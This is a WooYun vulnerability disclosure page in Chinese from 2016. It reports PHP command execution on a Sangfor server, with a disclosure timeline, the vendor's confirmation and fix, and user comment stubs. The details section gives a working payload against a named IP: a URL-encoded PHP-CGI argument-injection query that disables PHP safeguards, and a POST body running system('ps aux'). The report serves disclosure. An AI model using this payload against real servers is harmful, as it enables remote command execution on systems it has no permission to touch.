漏洞概要
关注数(24)
关注此漏洞
漏洞标题:深信服某服务器存在php命令执行
提交时间:2016-04-08 18:00
修复时间:2016-05-26 17:50
公开时间:2016-05-26 17:50
漏洞类型:命令执行
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2016-04-08: 细节已通知厂商并且等待厂商处理中
2016-04-11: 厂商已经确认,细节仅向厂商公开
2016-04-21: 细节向核心白帽子及相关领域专家公开
2016-05-01: 细节向普通白帽子公开
2016-05-11: 细节向实习白帽子公开
2016-05-26: 细节向公众公开
简要描述:
深信服某服务器存在php命令执行
详细说明:
网址:
http://202.131.75.66/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
POST:
<?php echo system("ps aux");?>
漏洞证明:
修复方案:
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2016-04-11 17:48
厂商回复:
感谢白帽子提交的问题。经确认,该问题确实存在。该服务器是我们区域自行搭建的渠道访问系统,目前正处于测试阶段, 5月份会发布正式版并进行安全维护,虽然该系统内部数据并不涉及核心业务,但此漏洞确实严重等级较高,综合考虑,我们给这个漏洞中危最高评级。
目前,该漏洞已经修复。
感谢白帽子为我们指出问题,请白帽子私信留下联系方式,我们将为您寄送礼物以示答谢!
最新状态:
暂无
漏洞评价:
评价
-
2016-04-08 18:03 |
小龙 ( 普通白帽子 | Rank:2568 漏洞数:506 | 我就问,还有谁!!!!!!!!!!!!!...)
-
2016-04-08 18:08 |
_Thorns ( 普通白帽子 | Rank:1712 漏洞数:261 | 以大多数人的努力程度之低,根本轮不到去拼...)
-
2016-04-08 18:26 |
whynot ( 普通白帽子 | Rank:678 漏洞数:136 | 为你解冻冰河 为你放弃世界有何不可)
-
2016-04-08 18:27 |
hecate ( 普通白帽子 | Rank:810 漏洞数:127 | ®高级安全工程师 | WooYun认证√)
-
2016-04-08 18:31 |
子非海绵宝宝 
( 核心白帽子 | Rank:1393 漏洞数:147 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)
-
2016-04-08 18:34 |
东方先生 ( 路人 | Rank:9 漏洞数:7 | 高冷吴大神的腿)
-
2016-04-08 22:32 |
Yuku ( 实习白帽子 | Rank:58 漏洞数:27 | 数据挖掘)
-
2016-04-12 11:39 |
waht000 ( 实习白帽子 | Rank:37 漏洞数:14 | 我还是太菜。。。)
